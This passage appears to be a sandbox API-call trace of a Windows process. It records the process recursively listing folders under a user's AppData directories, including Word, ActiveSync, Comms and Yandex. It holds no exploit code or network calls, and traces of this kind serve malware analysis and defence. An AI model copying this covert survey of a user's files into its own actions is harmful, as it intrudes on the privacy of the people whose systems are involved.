(in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\", lpFilePart=0x0) returned 0x35 [0266.822] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\word\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.823] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.823] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0266.823] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.823] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word", lpFilePart=0x0) returned 0x34 [0266.823] CoTaskMemAlloc (cb=0x20c) returned 0x5509430 [0266.823] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5509430 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0266.823] CoTaskMemFree (pv=0x5509430) [0266.823] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0266.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1c8) returned 1 [0266.824] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19ecd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0266.824] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\", nBufferLength=0x105, lpBuffer=0x19eca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\", lpFilePart=0x0) returned 0x24 [0266.824] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\*"), lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x63a80281, ftLastWriteTime.dwHighDateTime=0x1d86028, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6935d0 [0266.824] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x63a80281, ftLastWriteTime.dwHighDateTime=0x1d86028, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.824] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0266.825] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0266.825] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0266.825] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0266.825] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xb1dfb94f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xb1dfb94f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xd858984a, ftLastWriteTime.dwHighDateTime=0x1d8596d, nFileSizeHigh=0x0, nFileSizeLow=0x5d96, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0266.826] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0266.826] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0266.826] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x217bac55, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x217bac55, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0266.826] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0266.826] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0266.826] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5f4ede1f, ftLastAccessTime.dwHighDateTime=0x1d86028, ftLastWriteTime.dwLowDateTime=0x5f4ede1f, ftLastWriteTime.dwHighDateTime=0x1d86028, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0266.827] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0266.827] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40a64b1d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0266.827] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0266.827] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63a80281, ftCreationTime.dwHighDateTime=0x1d86028, ftLastAccessTime.dwLowDateTime=0x63a80281, ftLastAccessTime.dwHighDateTime=0x1d86028, ftLastWriteTime.dwLowDateTime=0x63a80281, ftLastWriteTime.dwHighDateTime=0x1d86028, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yandex", cAlternateFileName="")) returned 1 [0266.827] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.827] FindClose (in: hFindFile=0x6935d0 | out: hFindFile=0x6935d0) returned 1 [0266.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f188) returned 1 [0266.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f194) returned 1 [0266.828] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", lpFilePart=0x0) returned 0x2e [0266.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b8) returned 1 [0266.828] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", nBufferLength=0x105, lpBuffer=0x19ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", lpFilePart=0x0) returned 0x2e [0266.828] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\", nBufferLength=0x105, lpBuffer=0x19ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\", lpFilePart=0x0) returned 0x2f [0266.829] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\activesync\\*"), lpFindFileData=0x19eee0 | out: lpFindFileData=0x19eee0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.829] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.830] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0266.830] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0266.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f184) returned 1 [0266.830] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\.", nBufferLength=0x105, lpBuffer=0x19ec74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", lpFilePart=0x0) returned 0x2e [0266.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f134) returned 1 [0266.830] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", nBufferLength=0x105, lpBuffer=0x19ec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", lpFilePart=0x0) returned 0x2e [0266.830] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\", nBufferLength=0x105, lpBuffer=0x19ec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\", lpFilePart=0x0) returned 0x2f [0266.830] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\activesync\\*"), lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x693090 [0266.830] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.830] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0266.831] FindClose (in: hFindFile=0x693090 | out: hFindFile=0x693090) returned 1 [0266.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f4) returned 1 [0266.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f100) returned 1 [0266.831] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x34 [0266.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b8) returned 1 [0266.831] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x19ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x34 [0266.831] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data\\", nBufferLength=0x105, lpBuffer=0x19ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data\\", lpFilePart=0x0) returned 0x35 [0266.831] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\application data\\*"), lpFindFileData=0x19eee0 | out: lpFindFileData=0x19eee0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0266.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f17c) returned 1 [0266.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", lpFilePart=0x0) returned 0x29 [0266.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b8) returned 1 [0266.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", nBufferLength=0x105, lpBuffer=0x19ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", lpFilePart=0x0) returned 0x29 [0266.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", nBufferLength=0x105, lpBuffer=0x19ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", lpFilePart=0x0) returned 0x2a [0266.840] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\*"), lpFindFileData=0x19eee0 | out: lpFindFileData=0x19eee0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6935d0 [0266.841] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.841] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x50cde571, ftLastAccessTime.dwHighDateTime=0x1d8596d, ftLastWriteTime.dwLowDateTime=0x50cde571, ftLastWriteTime.dwHighDateTime=0x1d8596d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0266.841] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Unistore", cAlternateFileName="")) returned 1 [0266.841] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa2fb89cf, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xa2fb89cf, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 1 [0266.841] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa2fb89cf, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xa2fb89cf, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 0 [0266.841] FindClose (in: hFindFile=0x6935d0 | out: hFindFile=0x6935d0) returned 1 [0266.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0266.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f184) returned 1 [0266.842] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\.", nBufferLength=0x105, lpBuffer=0x19ec74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", 